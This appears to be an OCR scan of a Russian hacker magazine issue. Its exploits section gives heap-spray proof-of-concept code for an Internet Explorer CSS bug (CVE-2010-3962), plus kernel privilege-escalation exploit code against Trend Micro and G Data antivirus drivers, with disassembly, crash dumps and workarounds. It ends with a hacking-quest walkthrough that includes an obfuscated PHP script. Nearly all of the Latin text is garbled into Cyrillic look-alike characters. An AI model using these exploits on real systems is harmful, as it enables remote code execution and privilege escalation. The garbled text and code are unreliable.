±1П1дг !РоКе1еазеСопсехе+0х ±: 

±97е9075 ±О0±сЮ8 Іоск хасШ сіщоггі р±г [еах], есх Йз: 0023 ; 4141413Й=???????? 

кс!> к 

СМЫЕВР неслааг 

±0962ЬЬс ±97с90±9 ±1гНдг ! РоНе 1еазеСопСех^+0х± 

±0962Ьс8 ±9ЬЗеес6 ±1ъНдг ! РІъИеІеазвСонъехс+ОхІ 1 

ІЯАКМШС: БСаск иішіпсі іп±огтасіоп по± аѵахІаЫе. Еоііашіпд ±гаіяез хту Ье щгопд. 

±09б2Ье4 ±9Ь8сП?сі НіпіІсрЬ+Охесб 

±0962е 18 ±9Ь93с±8 ИіпіІсрс+0хІ17с1 

±09б2с2 8 ±9ЬЗес?4 ИіпіІсрЪ+0х7с±8 

±0962сЗ 4 804ее119 НіпіІсрс+0х2с74 

±09б2с44 80574й5е пЪ ! Іор±Са1 ІРг іѵег+ОхЗ 1 

±0962с58 8057 5Ь±± пс ! Іор5упсЬгопоиз5еі:ѵісеТаі1+0х70 

±0962 СІ00 8056е46с п± ! ІорХххСопЪгоІЕ 11е+0х5е7 

±0962 аз 4 8053аб38 пс !ИсРеѵіееІоСопсго1Еі1е+0х2а 

±0962а34 7с90е4±4 п± ! КіЕазССа11ЕпСгу+0х±8 

0012±еЬ4 7с90а26с псаіі ! КіГазсБузсешСаІ ІРес 



Первая весточка о потенциальной уязвимости 




ІАМКТіфвл 
I Врйря^Ігчівин 



12 гя 



іЧѣооІЕЧросЧНІп ІІсрЬ_1м_ЬочпЧКс 1с лес 
Раса ГоІ»1С«гд 2011 ОЛау Ііослі Ныч*е 
I’ КікіСл Т-и^-аклпаи СССЯІі Ке гс-лі^с 1п Те, 
0 зЬеПеойс ас йяООЭбСШОЧ 
іИл догНе-гн іп п - І іЗи(1іпогІ]ег:іііп 1 
шісв си(№ГиПѵ акмпей! 



| гг СЛѴѴІНРОЩІѴауіІі 



ЛЬоеипвпС* апеі Ба С і іпдк Мне а р>е гмі 
іс іч*до ГС ИітІоиЕ; ХР I Версия 5.1.26Э 
'> Корпораций Майкрософт , 1 У 85 -2001 



Успех ядерного эксплоита 



ляет недостаточное количество памяти для хранения определенных 
комбинаций С55-тегов. 

Рассмотрим РоС-код, который первым появился в паблике: 

<ЬЦш1> 

скаЫе зку 1 е=розікіоп : аЪзоІике; сіір : гесС ( 0 ) > 

</Ъ.кт 1 > 

Дизасм-листинг этого кода: 

тзЫгтІ ! СЬауоиС : : ЕпзигеБізрЫосіеВаскдгоипс 1 + 0 х 81 : 
7 с 1 сМс 2 сі хог езі, езі 

7 ЦсЫс 2 Е іпс езі 

7 с 1 сЫсЗО ризк езі 



7 с 1 сМс 31 


тоѵ 


есх, есіі 


7 йсМсЗЗ 


саіі 


тзіШті ! СБізрБосІе : : 






ЗеіВаскдгоипсІ ( 7 <ісаіе 4 Ь) 


7 с 1 сЫс 38 


тоѵ 


еах , сіѵюгсі ріг [есіі] ; <-- испорчен- 


ный указатель 






7 сЗсЫсЗа 


тоѵ 


есх, есіі 


7 < 2 сМсЗс 


саіі 


склгогсі ріг [еах+ЗОЬ.] ; <-- а вот 



здесь и происходит вызов и улёт в исключение 

Как видно изданного кода, берётся таблица виртуальных методов из 
окфесДО], а далее по смещению 0x30 находится указатель функции. 
Если немного покопаться, становится понятно, почему память ока- 
зывается испорченной — обнаружилось, что в функции БеШзегСІір 
происходит порча указателя. 



тзіШті ! СБізрЫосіе : : 8 екБзегС 1 ір+ 0 х 84 : 

7 сМ 8 Ъ 5 с 10 саіі тзіШті ! СКесР : : 

КезБгісРКапде ( 7 с 1 с 189389 ) 

7 ск 18 Ъ 5 с 15 тоѵ еах , сіѵгогсі рРг [ есЗ.і +4 ] 

7 сМ 8 Ъ 5 с 18 апсі еах, езі 

7 сІс 18 Ъ 5 с 1 а тоѵгх есх, ЪуБе рРг тзіШті ! СБізрЫосІе : : 

_ехРга 8 І 2 еТаЫе ( 7 сІс 31 с 10 ) [еах] 
7 сІс 18 Ъ 5 е 1 тоѵ еах, есіі 

7 сМ 8 Ь 5 еЗ зЫ есх, 2 

7 сМ 8 Ъ 5 е 6 зиЬ еах, есх 

7 сМ 8 Ъ 5 е 8 ог сілгогсі ркг [еах] ,1 в еах содер- 

жится адрес таблицы виртуальных ф-ий 



Спустя несколько дней в паблике появился эксплойт, использующий 
простейший Ьеар-зргау, естественно не обходящий 0ЕР/А5І_Р. Вот 
его КОД: 



<Ь.Ьщ1> 

<кеас 1 ><кіРІе>рос СѴЕ- 2010-3962 2 егосіау</РіРІе> 
<зсгірр> 
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КЕѴІЕѴ» 




ЕХРЮІТЗ 






5 




РЕѴІЕѴѴ 




І\І_ ѴІЫМГ 









ЕХРЮІТЗ 

РЕѴІЕѴѴ 




5 




гѵь ѵ іи ѵѵ 





ЕХРЮІТЗ 

КЕѴІЕВД 




Прыжок в пропасть 



ЕипсЕіоп аііос (ЪуЕез , тузЕг) { 
ѵаг зЬеНсобе = ипезсаре ( 

'Тут много зашифрованного мусора : ) ' ) ; 
ѵгііііе (тузбг . ІепдЫк ЬуЕез) тузЕг += тузЕг; 
гебигп тузбг . зиЪзбг ( 0 , (ЬуЕез-6)/2) + зкеіісосіе; 

} 

</зсгірЕ> 

</Ь.еа<5> 

<Ьос1у> 



3. Атакже файл АррІу_и5ег_С55.гед со следующим содержимым: 

Ѵ7іпскллз ВедізЕгу ЕсІіЦог Ѵегзіоп 5 . 00 
[НКЕУ_СІШКЕМТ_ІЗЗЕК\ЗоЕЕ™аге\МісгозоЕЦ\ІпЦегпеЦ 
Ехр1огег\ЗЕу1ез ] 

"Юзег ЗСуІезЪееС'^'С: \\ [бігесЕогу ІосаЕіоп] \\КВ2458511 . сзз" 
"Юзе Му ЗЕуІезкееЕ " =<±лгогс1: 000 00001 

Где [сіігесіогу Іосаііоп] — путь кранее созданному файлу КВ245851 1 . 
С55 



<зсгірЕ> 

аіегб ( 1 рйЗЗг : сііскше'); 
ѵаг еѵіі = петл Аггау ( ) ; 

ѵаг ЕАКЕОВЦ = ипезсаре (" %и0б0с!%и0с10с1'' ) ; 

ЕАКЕОВЙ = аііос (1294464 , ЕАКЕОВЦ) ; 

Еог (ѵаг к = 0; к< 1000; к++) { 

еѵіі [к] = ЕАКЕОВЦ.зиЪзкг (0, ЕАКЕОВЙ . ІепдЕЬ) ; 

} 

сІоситепЕ .шгіЕе ( 

"<ЕаЫе зЕу1е=розіЕіоп: аЪзоІиЕе; сіір: гесЕ (0) >" ) ; 
</зсгірЕ> 

</Ъос1у> 

</1гЕт1> 

С полным эксплойтом ты можешь ознакомиться на ехріоіі-сі Ь.сопп/ 
ехріоііз/і 5376 . 



50ШТІ0М 



Кнастоящему времени никакого патча не выпущено, нозатоесть 
утешительный ѴѴогкагоипсІ от М5. 

1 . Создай файл стилей КВ245851 1 .055: 

ТАВЬЕ 

{ 

РОЗІ \ТІ(Ж : геІаЕіѵе ІітрогЕапЕ; 

} 

2. Создай резервную копию ветки реестра: 

гедебіЕ /е СЗЗ-Ьаскир . гед "НКЕУ_СШВЕЫТ_иЗЕК\ЗоЕЕ™аге\ 
МісгозоЕЕ\ІпЕегпеЕ Ехр1огег\ЗЕу1ез " 



4. Выполни этотфайл и ты неуязвим :). 

ПОВЫШЕНИЕ ПРИВИЛЕГИЙ 
В ПРОДУКТАХ ТРЕЫР МІСРО 

• Тііапіипл Махітипп Весигііу 

• Тііапіит Іпіегпеі Весигку 

ШНз 

Интересная уязвимость была обнаружена в ходе исследования драй- 
веров антивирусных продуктов. Суть ее сводится ктому, что, вызывая 
функцию ОеѵісеІоСопІгоІс ІосіІСосІе равным 0x220404, атакующий 
перезаписываетзначение, которое является указателем на некую 
функцию. Последняя необходима для обработки входящих/исходя- 
щих пакетов. 

Для более детального объяснения бага, рассмотрим ІосН-обработчик 
\\А*тІсіі-устройства: 

. ЕехЕ : 0001БВ7В 1ос_1БВ7В: 

. ЕехЕ : 0001БВ7В ЕезЕ ск\гогс1_22 89С , ІОООООООЪ. 

. ЕехЕ : 0001БВ85 шоѵ ебі , [еЬх+ОСй] 

; ебі — указатель на входной буфер 
. ЕехЕ : 0001БВ88 зЬэгЕ 1ос_1БВ95 

. ЕехЕ : 0001БВ8А ризЬ. оЕЕзеЕ аІосЕг1_Ъіпс1_сЕ 
; " [ІОСТКЬ_ВІМВ_СЕМ] \п" 



. ЕехЕ : 0001БВ8Е 


саіі 


БЪдРгіпЕ 


. ЕехЕ : 000ІБВ94 


рор 


есх 




. ЕехЕ : 000ІБВ95 


ризй 


ебі 


; ѴігЕиаІАбсІгезз 


. ЕехЕ : 000ІБВ96 


саіі 


езі 


; МшІзАббгеззѴаІіб 


на валидный адрес 






. ЕехЕ : 0001БВ98 


ЕезЕ 


аі. 


аі 


. ЕехЕ : 0001БВ9А 


32 


Іос. 


_1ВВ19 
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і — ч 
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ЕХРЮІТ5 
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Сладкий $иссе$$ эксплуатации 



тесИпіса! ігтРогтагіоп: 

*** 5ТОР: ОхООООООвЕ (0ХС0000005, 0x00370000, 0ХР058В938, ОхОООООООО) 



Синячок, вызванный попаданием в временное окно 
между эксплуатацией и сброса указателя в ШИ 



сетевой интерфейс также будет вызвана функция зи Ь_1 ОС 04, что 
приведёт к си нему экрану смерти, та к как обращение к нашему шел- 
лкоду (который, кстати, лежит в пользовательском АП) немедленно 
приведёт к исключению Раде Ра и и. 

Чтобы этого избежать, надоустановитьзначениесІѵѵогсІ_228В4в І\ІІИ_І_, 
тем самым избежать выполнения инструкци^'тресх (смотри код). 

ШОКЪ МШАРІ КезеЬРоіпЬег ( ЬРѴОІБ ІрРагаш ) { 

НАШЬЕ ЬБе ѵі с е ; 

БШЕБ *іпЪи:Е:Е; 



. ЬехЬ : 0001БВА0 сшр [еЪр+БеѵісеОЬд есЬ ] , 8 ; проверка 

на длину входного буфера 
. ЬехЬ : 000ІБВА4 ^Ь 1ос_ІВВІ9 

. бехб : 0001БВАА гпоѵ еах , [ебі] ; еах — содержит первые 
4 байта из нашего буфера 

. ЬехЬ : 0001БВАС шоѵ б.ѵ\гогс1_22 8В4 , еах ; запись в гло- 
бальную переменную 

При анализе х-геЫссылок) на сіѵѵо гсІ_228 В4 становится понятно, 
что при вызове стандартной функции ѵѵіпзоск ЬіпсІ, управление 
приходит на эту функцию, что ведёт к исполнению инструкции )тр 
есх, и, соответственно, прямому прыжку на шеллкод атакующего! 



. ЬехЬ : 00010СБ4 


зиЬ_10СБ4 ргос пеаг 


. ЬехЬ : 00010СБ4 


шоѵ 


ебі , ебі 


. ЬехЬ : 00010СБ6 


ризЬ еЬр 


. ЬехЬ : 00010СБ7 


шоѵ 


еЬр, езр 


. ЬехЬ : 00010СБ9 


шоѵ 


есх, быогб_2 2 8В4 ; запись в есх 


. ЬехЬ : 00010СБЕ 


хог 


еах, еах 


. ЬехЬ : 00010СЕ1 


ЬезЬ 


есх, есх 


. ЬехЬ : 00010СЕЗ 


12 


зЬогЬ 1ос_10СЕ8 ; проверка на 


ШЬЬ 






. ЬехЬ : 00010СЕ5 


рор 


еЬр 


. ЬехЬ : 00010СЕ6 
. ЬехЬ : 00010СЕ8 


1 т Р 


есх ; прямой прыжок ! ! ! 


' 




. ЬехЬ : 00010СЕ8 






. ЬехЬ : 00010СЕ8 


1ос_10СЕ8 : 


. ЬехЬ : 00010СЕ8 


рор 


еЬр 


. ЬехЬ : 00010СЕ9 


геЬп 


4 


. ЬехЬ : 00010СЕ9 


зиЬ_10СБ4 епбр 



ЮГ 



Для эксплуатации уязвимости достаточно вызвать функцию 
ОеѵісеІоСопІгоІ, а затем ЬіпсІ: 



іп = 0x10, оиЬ = ОхОС; 

*іпЬи11 = гіпдО_зЬе11собе_ас1с1гезз ; 
БеѵісеІоСопЬгоІ (ЬБеѵісе, 
іосЫ , 

(ЬРѴОІБ) іпЬиІІ , 
іп , 

(ЬРѴОІБ) іпЬиІІ , 
оиЬ , 

& 1 еп, 

ШЬЬ) ; 

ЬіпсІ ( ЬізЬепЗоскеЬ, ( ЗОСКАББК* ) &зегѵісе, 
зігеоі (зегѵісе) ; //прыгаем на шеллкод! 



БШЕБ іосЫ = 0x220404, іп = 0x10, оиЬ = ОхОС, Іеп; 
БШЕБ іпбегѵаі = 50 0; //чем меньше, тем лучше ! 
Зіеер (іпбегѵаі) ; 

іпЬиІІ = (БШЕБ *) шаііос ( 0x1000 ) ; 

ІО ( ! іпЬиОО) и{ 

ргіпЫ ( "шаііос Оаііебі \п" ) ; 

геЬигп 0 ; 

} 

*іпЬи00 = 0; 

ЬБеѵісе = (НАШЬЕ) ІрРагаш; 

БеѵісеІоСопЬгоІ (ЬБеѵісе, 
іосЫ , 

(ЬРѴОІБ) іпЬиОО , 
іп, 

(ЬРѴОІБ) іпЬиОО , 
оиЬ , 

& 1 еп, 

ШЬЬ) ; 

Ігее ( іпЬиОО) ; 

геЬигп 0; 



юштюы 



Ждём патча отТгепсІ Місго или ставим другой антивирь :). 

МНОЖЕСТВЕННЫЕ УЯЗВИМОСТИ 
В ПРОДУКТАХ 6 РАТА 

0 Оаіа ТоІаІСаге 201 1 

У этого продукта сразу несколько проблем: 

І.Пасе Сопсііііоп в перехвате ІЧаІіѵе АРІ функций 
2. Ошибки в Іосіі обработчике 

Рассмотрим подробнееуязвимость в Іосііобработчике девайса 
МіпіІсріСопІгоЮеѵісеО. 

Эта брешь примечательна тем, что является ярким примером того, что 
не стоит слепо передавать непроверенныеуказатели в функции ядра. 
Рассмотрим код обработки Іосіі 0x83170180: 

. ЬехЬ : 00010БВС сшр ебх, 8317 01801т ;< сравнение 

с заветным значением 

. ЬехЬ : 00010БС2 32 1ос_10ЕАБ 



Но не стоитзабывать, что, изменив значение сіѵѵогсі_228В4 на адрес . ЬехЫ 00010ЕСО ризЬ еах; < еах содержит первые 

своего ядерного шеллкода, при прохождении нового пакета на 4 байта входного буфера 



► 044 



ХАКЕР 01 (144) 201 1 










РЕѴІЕѴѴ 




5 




І\І_ » ІІ_ѴѴ 





ЕХРЮІТ5 

РЕѴІЕѴѴ 
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1 











ехсертісю_соое: (іггзтАтиз) Охс0000005 - <штые со дес есгог сосіе сехо 

ГАШ,ТШС_ІР: 

+370000 

00370000 41 іпс есх 

ТКАРГКАНЕ: 20891938 -- (.Стар 0x2222222220891938) 

ЕггСогіе - 00000011 

еах-00000000 еЪх-2118асЮг есх-00370000 ейх-00000002 езі- 10000000 есіі-20891а28 
еір-00370000 езр-208919ас еЪр-20891а84 іор1-0 пѵ ир еі рі пг па ре пс 

сэ-0008 зэ-0010 йз-0023 еэ-0023 2з»0030 дэ-0000 е21-00010206 

00370000 41 іпс есх 

Кезессіпд сіеіаиіс зсоре 

0ЕГАШ.Т_ВІІСКЕТ_ІО: ОКІѴЕК_ГАШ.Т 

ВІГССНЕСК_ЗТК: 0х8Е 

ркосеззыане: (зѵсЬозс.ехе) 

ЬАЗТ_ССИТРОЬ_ТІШІЗГЕР: 2гою 21185Ъ59 со 00370000 

РОЗЗІВЬЕ_ІЫѴАЫР_СОМТКОЬ_ТІШІЗГЕК: 2гою 21185Ъ54 СО 21179ССІ4 

5ТАСК ТЕХТ: 

ІІАМПЫС: Ггаюе ІР пос іп апу кпоип тойиіе . Г оііоаіпд 2гат ез тау Ье ѵгопд. 

2089 19а8 21185Ь59 Г08919е0 814Ъес!38 8051098С 0x370000 
2089 1а84 2118642а 814Ьес80 814ЬеЬс8 8123252С Сп>саі+ОхсЪ59 
2089 ІааО 804ее119 812с37а8 812с3860 81662с16С сгпССІі+Охс142а ] 

20891аЬО 211Ь5707 20891Ь9с 00000008 20891Ы0 пс ' 1ор2Са11Вг іѵег+ОхЗ 1 
2118аСЮ2 4е455352 41445244 52474154 095сНсН1 а2Й ! А2йГазС0асадгатЗепсІ+0х22сі 



Информация о неудачной попытке эксплуатации: про- 
цесс зѵсГюзГ.ехе решил полезть в инет и исполнить код 
в памяти, которая неспроецирована в его АП 



. Іехі : 00010ЕС1 саіі ЕІІКеІеазеСопІехІ ; 

При поиске информации о данной функции в ѴѴйК, особо многого не 
проясняется. 

Как видно, функция при ни мает один единственный аргумент — 
указатель на некий контекст, и выполняет декремент ссылок на этот 
контекст. 

Поиск структуры РІ_Т_СОІ\ІТЕХТ в документации ничего не дал. 

Что же, после этого я решил поискать в отладочных символ ах и 
даже в исходниках винды. Но к сожалению, яненашёл ни какой 
информации об этой структуре. Штудирование документации 
особо не помогло, стоит подключить свои любимые средства: 
протрассировав Зіер'ами в ѴѴіпсІЬд, становится понятно цепочку 
вызовов которая приведёт к прямому вызову по контролируе- 
мому адресу в функции ОоРгееСопІехІ:: РІіРеІеазеСопІехі: -> 
ОоРеІеазеСопІехі: -> ОоРгееСопІехі:. 



Однако, чтобы добраться до ОоРгееСопІехІ;, надо сформировать фей- 
ковую недокументированную структуру РІ_Т_СОІ\ІТЕХТ таким образом, 
чтобы значение количества ссылок на данный контекст стало равным 
нулю: 



. іехі 
. іехі 
. Іехі 
. Іехі 
. Іехі 
. Іехі 
. Іехі 
. Іехі 
. Іехі 
. Іехі 
. Іехі 
. Іехі 



: 00012066 
: 00012 066 
: 00012 066 
: 00012 066 
: 00012066 
: 00012066 
: 00012068 
: 00012 069 
: 0001206В 
: 00012 06С 
: 0001206Е 
: 00012072 



; іпі зісісаіі БоКеІеазеСопІехі. (РѴОІБ Епігу) 

_БоКе1еазеСоп1ех1@4 ргос 



= склгогсі ріг 8 




тоѵ 


есіі , 


есіі 


ризЬ 


еЬр 




тоѵ 


еЬр, 


езр 


ризЬ 


езі 




тоѵ 


езі , 


[еЬр+ЕпБгу ] 


Іеа 


еах. 


[езі+24Ь] 


ог 


есх. 


ОЕРРРРРРРЬ 



. Іехі : 00012075 



. Іехі 
. Іехі 

. Іехі 
. Іехі 
. Іехі 



: 00012079 
: 0001207В 

: 00012081 
: 00012 083 
: 00012 085 



. Іехі : 00012 086 



-- есх = -1 

Іоск хасісі [еах] , есх 
-- декремент количества ссылок 

ЗП 2 зкогі 1ос_120А6 

саіі сіз : ітр КеСе1Сиггеп1Ігд1@0 

; КеСеІСиггепІІгдІ ( ) 
стр аі , 2 
ЗпЬ зкогі 1ос_1208Б 
ризЬ. езі 

-- езі под нашем контролем 

саіі _БоЕгееСоп1ех1@4 

; БоЕгееСопІехІ (х) 



Главное в эксплуатации данной уязвимости правильно сформировать 
фейковую структуру РІ_Т_С0І\ІТЕХТ, скопироватьуказатель на неё в 
первые 4 байта входного буфера и вызвать ОеѵісеІоСопІгоІ: 

ѵоіеі сгаіС_іаке_іІВ_соп1іех1і ( 
с лаг* Ъиіі, 

БРѴОІБ зЬе11сос!е_асісіг) 



{ 



БШКБ геіегепсез = 1; 
БШКБ * ЕпБ гу ; 



. Іехі : 0001ІЕ04 


; іпБ . 


зісісаіі БоРгееСопІехІ (РѴОІБ ЕпБгу) 


ЕпБгу = ( БШ)КБ* ) таііос ( 0x8 ) ; 


. Іехі : 0001ІЕ04 


_БоЕгееСоп1ех1@4 ргос пеаг 


Епігу [ 0 ] = Епігу; //ЕпБгу[0] == езі 


. Іехі : 0001ІЕ04 








ЕпБгу [ 1 ] = зЬе11сос1е_асІсІг ; //[езі + 4] — гО зЬеІІсосіе 


. Іехі : 00011Е04 Епкгу 


= сіѵтогсі ріг 8 


тетсру (Ьиі 1-0x4 , &геіегепсез , 0x4); 


. Іехі : 00011Е04 








тетсру (Ьиіі-0х2 8 , Епігу, 0x4); 


. іехі : 00011Е04 




тоѵ 


есіі , есіі 


} 


. БехБ : 0001ІЕ06 




ризЬ 


еЬр 




. Іехі : 0001ІЕ07 




тоѵ 


еЬр, езр 




. БехБ : 0001ІЕ09 




ризЬ 


езі 




. Іехі : 00011Е0А 




ризЬ 


есіі 


сгаі1_іаке_111_соп1ех1 ( іпЬиііег , граде) ; 


. Іехі : 00011Е0В 




тоѵ 


есіі, [еЬр+ЕпБгу] 


Ьиіі[0] = іпЬиііег; 


. Іехі : 00011Е0Е 




тоѵ 


езі, [есіі] 


БеѵісеІоСопІгоІ ( 


; < 


есіі под нашем контролем 


кБеѵісе , 


. Іехі : 00011Е10 




тоѵ 


еах, [езі+4] 


іосіі , 


. Іехі : 00011Е13 




Іезі 


еах, еах ;< проверка 


Ьиіі , 


на ШЬЬ 








іп. 


. Іехі : 00011Е15 




92 


зЬогІ 1ос_11Е24 


Ьиіі , 


. Іехі : 00011Е17 




хог 


есх, есх 


оиі , 


. Іехі : 0001ІЕІ9 




тоѵ 


сх, [езі+ОСЬ] 


&1еп, 


. Іехі : 0001ІЕІБ 




ризЬ 


есх 


ШЬЬ) 1 


. Іехі : 0001ІЕІЕ 




Іеа 


есх, [ес1і+28Ь] 




. Іехі : 00011Е21 




ризЬ 


есх 


|$оияюыЦ 


. Іехі : 00011Е22 




саіі 


еах ; < вызов по 


Исправлений к настоящему времени не выпущено. Так что перебира 



контролируемому адресу 



емся на другой продукт.. 
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КВЕСТ 
НА ОДНОМ 
ДЫХАНИИ 



Прокачиваем хакерские трюки на квесте 

• Раз ты изучаешь рубрику «Взлом», то, наверное, неплохо 
разбираешься во всяких уязвимостях вроде $Ш_-инъекций и Х55. Теория 
без практики в этих делах - пустое место, но ломать чужие сайты ради 
забавы - совсем хреновая идея, к тому же опасная с точки зрения 
статей 272 и 273 УК РФ. Впрочем, не все так плохо: есть отличный способ 
набить хакерские скиллы и не нарушая закон. 



Мы с моим приятелем приготовили тебе необычное развлечение, 
которое еще и полезно — ты сможешь узнать много новых вещей, о 
которых раньше просто не думал, но которые вполне пригодятся тебе в 
жизни. Это необычный ІТ-квест, расположенный по ссылке ЫЧрУ/каіті. 
ги/диезГ Он отличается от стандартных хак-квестов: мы тебя не будем 
заставлять подбирать поля к тем же надоевшим 50І_ или искать их в 
НТМІ_-коде. Задания очень разнообразны и повторов почти нет. 

На момент написания статьи в квесте было зарегистрировано около 
600 человек, но пройти его смогли только 21. Говорит нам это только 
о том, что многие люди очень ограниченно и стандартно мыслят или 
просто не умеют искать нужную информацию в интернете. Разумеется, 
человек может называть себя хакером за исключительную смекалку и 
способность к нестандартному мышлению. Хочешь попробовать свои 
силы — заходи по адресу выше, регистрируйся и начинай прохожде- 
ние. А в этой статейке мы распишем решения всех заданий, которые 
вошли в квест. 

Думаю, пояснять, как зарегистрироваться в квесте, смысла нет. Стоит 
лишь набрать в консоли команду Гіеір и получить подробный список 
доступных действий. Итак, поехали! 

Уровень О 

Автор: сіх 

Решение: Ну, это даже и не уровень. Это просто некоторая трениров- 
ка работы с консолью квеста. Достаточно ввести в консоль команду 
апз и какой-либо ответ, пусть даже неправильный, через пробел, и 



квест выдаст нам верный ответ. Остается лишь использовать его и 
оказаться на первом уровне. 

Уровень 1 

Автор: Каіті 

Решение: Первый уровень мы сделали для разминки, и даже стран- 
но, что так много людей не смогли его пройти. Это просто кроссворд с 
небольшим количеством вопросов, а ответы на них прекрасно ищутся 
через Ѳоодіе. Проблема при прохождении возникала в тот момент, 
когда все слова уже отгаданы. После этого предлагается из букв, 
расположенных в красных клетках кроссворда, составить слово. Вот 
здесь-то многие и не могли сообразить, хотя слово действительно 
элементарное — «генератор». Это и есть пароль к уровню 2. 

Уровень 2 

Автор: Каіті 

Решение: Этот уровень также представляет собой не совсем 
хакерское задание. Тебе выдается картинка, разбитая на 16 ква- 
дратов. Чтобы собрать ее, нужно сыграть в «пятнашки». Хотя, 
конечно, ты мог бы заметить, что квадраты расположены подряд 
по именам, и сборка картинки сводится к расположению частей 
по порядку в любом графическом редакторе. Но это еще не все, 
нам требуется узнать, что изображено на этой картинке. Если мы 
введем неправильный ответ с помощью команды апз, то получим 
небольшую подсказку — можно ведь воспользоваться серви- 
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<? /* <= = ===зс.гееъ тадіс=====> */ /* <Баѵісі В1аіпе>: Ага, вот эти ребята... */ 

ргіпЬ(дгипсоіпргезз (Ьазеб4_йесос1е ( 

1 еГ5Тс±іхйЗЬОСУ5ШігсгЫВУЗМЬстітЫУі:Хз7Ѵ1ЬСрКгЫКІ5іхОКТОаТОШ2к9ЛѴВРѴГі<2и4/та5иЫКкКГеІ 
КоуНіЬЬѴ11ТВ0015Со2ЕВ^1ПіЕІГПЛ-2ідод0удіЕГЕ0у9зрИ1950ВдСд/іг/ 1 ) ) ); /* <РеСег>: 
Ненененене ! ! */ ?><? /* <Аѵоп>: Нет, нет, Дэвид Блейн, нет! */ /* <Баѵій 

В1аіпе>: Я делаю особую, уличную магию. */ ргіпі (дгипсотргезз (Ъазеб4_сіесосіе ( 

1 еГ5БК81БЬзпМг1ОШгІ0С0С0зЬАюЫ920уй5зѴкт0й5юд5д2ЧЧЕ80С ЗЫѴ18ЕОРОЪа2дІрІіСісюЕ2кОр1гІіІіііГ 
Ѵ05РВАаоі0КІисНЕУ2С1ЫО0ЬкосК53КТО1іКЬЕ41Н41Р5и30Т0пѴиЕіпИѴзтН1ЬЗиВ0Вибі01 І ) ) ) ; /* 
<Баѵій В1аіпе>: Кто хочет увидеть немного магии? */ ?><? /* <Аѵоп>: Чё мы тебе, 
цолботрясы какие-нибудь? Нет, спасибо! */ /* <РеЪег>: Мы целый день шопились, 

заманались, хотим просто отдохнуть, всё! */ ргіпі (дгипсотргезз (Ьазеб4_йесойе ( 

' еГ59кѴ1гд2АШш+Е/0спріХ0гзЫаР4діп0НЗзУоІЮЗ ЛкоѴъТКдЪѴЫІБЛбХЭігСЫ-ОЕбіІпІКЗѵСсБіІ/ЕОз 
4иСсХ1АХ9:ЕЫГОИ'ІЫ) гке 25г 60УС!СА7ѵи2Ьх 6рч0/ ѵТВ82 г Э^ЕуЕОУдбуНЛ: 17МсЮіКК0аб 2ТССС04Б іК5о 
ЕхІ+ЪАОѴБШібЗи^ Сеу431І5д80.эІ.Наі;з5Едп7ЛЫ6(і2ѵГОкі:КоУибе/дІ,х:ЁѴАТуШ30ѵ83хТ6еЗаНкга6НТК7 
аБХхХкХкйЕ^ 1ОО2х1аР2и0+ЬзЗЕ гіМРКтв б з 1 ѵН/ ъщЗ 2 і ѵНі иБ ѴБЗ х о Еѵ8 4 Кз МуѴ8 ХдН7 НС* дг с*8 р ѵБ гікС х 
2МрК1НиоѵдШэз11і0йТбг08ЕОсрздСЕІ1Е(10гпазЬ4Рі;1іИІз1.г іЗи1СА+2іѴХе21ІхгНН2тіТ2Х1иЕ1Е/ІШдЪ 
сІЕКі/ІзіУХ+ѵТтБАъсѵ0ѵ9У1хѴВдР^К+Ксіу9зс4' ) ) ) ; /* <Баѵій В1аіпе>: И где вы 

Обфусцированный исходник РНР с третьего уровня 




Гаечка сообщит нам пароль 

сом Тіпеуе.сот! В любом случае, задание несложное, ответ — 
«Вавилон» или «ВаЬуІоп». 

Уровень 3 

Автор: Каіті 

Решение: «Расслабляющие» уровни подошли к концу, и теперь 
тебе придется поднапрячь мозги, чтобы пройти дальше. Ты полу- 
чишь РНР-скрипт, из которого требуется извлечь пароль, вер- 
нее, ввести в форму скрипта необходимую строку, чтобы он этот 
пароль выдал. Не все так просто — скрипт обработан обфускато- 
ром от бх :). Но рано пугаться — начнем разбираться! Открываем 
скрипт в блокноте и видим неразборчивый треш. В общем-то, 
сразу понятно, что исходник накрыт Ьазе64, и чтобы просмотреть 
его содержимое, необходимо заменить все инструкции еѵаі на 
ргіпі и выполнить скрипт — после этого зашифрованный код 
расшифруется, и мы увидим его в браузере в изначальном виде. 
Но и сейчас нас встречают исковерканные имена переменных 
и функций, зашифрованные строки... И снова не обязательно 
разбираться во всем этом, нужно лишь понять общую логику 
скрипта. Как сказано в задании, скрипт ожидает от нас некото- 
рую строку, которую он сочтет правильной, и выдаст нам пароль к 
четвертому уровню. А это значит, что следует лишь «прибить» эту 
проверку, чтобы скрипт выводил пароль всегда. Присмотревшись 
к коду, видим два іГа. Первый проверяет, было ли введено что-то 
в форму, а второй — это как раз та самая проверка. Заменяем все 
огромное второе условие на Ігие, сохраняем код как рбр-файл, не 
забыв дописать <?рбр и ?> в начало и конец, запускаем скрипт и 
вуаля — теперь он выдаст пароль в любом случае, что бы мы ни 
напечатали в поле ввода! 



$СЬОВАЬ5[ '_613757856_' ] =Аггау (Ъазе64_йесойе ( 1 а 1 . 1 ХШ 1 . ' ѴХЛ 1 .'уУХк='), 

Ьазе64_сіесосіе ( . 1 с 1 . ' 2 162И9го' ) ,Ьазеб4_йесойе ( 1 72 Ьу 1 ) ,Ьазеб4_йесойе ( ' ЬЗЛк' ) ) ; 

СипсЪіоп _2 118188873 ($і){ $а=Аггау ( 1 а2Ѵ5' , 1 а2Ѵ5' , 1 а2Ѵ5' , 1 а2Ѵ5' , 1 70==' , 1 Зк ==' , 

1 Ѵд== 1 , 1 аѵ== ' , ' ЬА== ' , ' Ь0== ' , ' 2д== ' , 1 КА== ' , 1 2А== ' , 1 Ь0== ' , ' 2д== ' ) ; геіигп 
Ьазеб4_йесо<Зе ( $а[ $ і] ) ;}і± (іяяеі ( $_Р05Т[_2 118188873 (О)] ) && 1 етріу ( $_Р05Т[ 

_2 118188873 (1)] ) && ! $СЬ0ВАЬ5[ 61375785ь_' ] [О] ( $_Р05Т[_2 118188873 (2) ] ) ) { $_=$_Р05Т[ 

_2 118188873 ( 3 ) ] ; іі (іяяеЬ ( $_[гоипс1 ( + ) ] ) 44 $_[гоипсМ )]=== _2 118 188873 ( О (гоипгі 

(0+2. с + : 5) == $_[гоипй( + + + + + ■: ) ] л гоипй ( +.))){$ =Аггау (_2 118188873 

(5) ,_2 118188873 (6) ,_2118188873 (7) ,_2118188873 (8) ,_2118188873 (9) ,_2118188873 (10) , 

_2 118188873 (11) ,_2 118188873 (12) ,_2118188873 (13) ,_2118188873 (14) ) ;іог ($ =гоипс1(0 

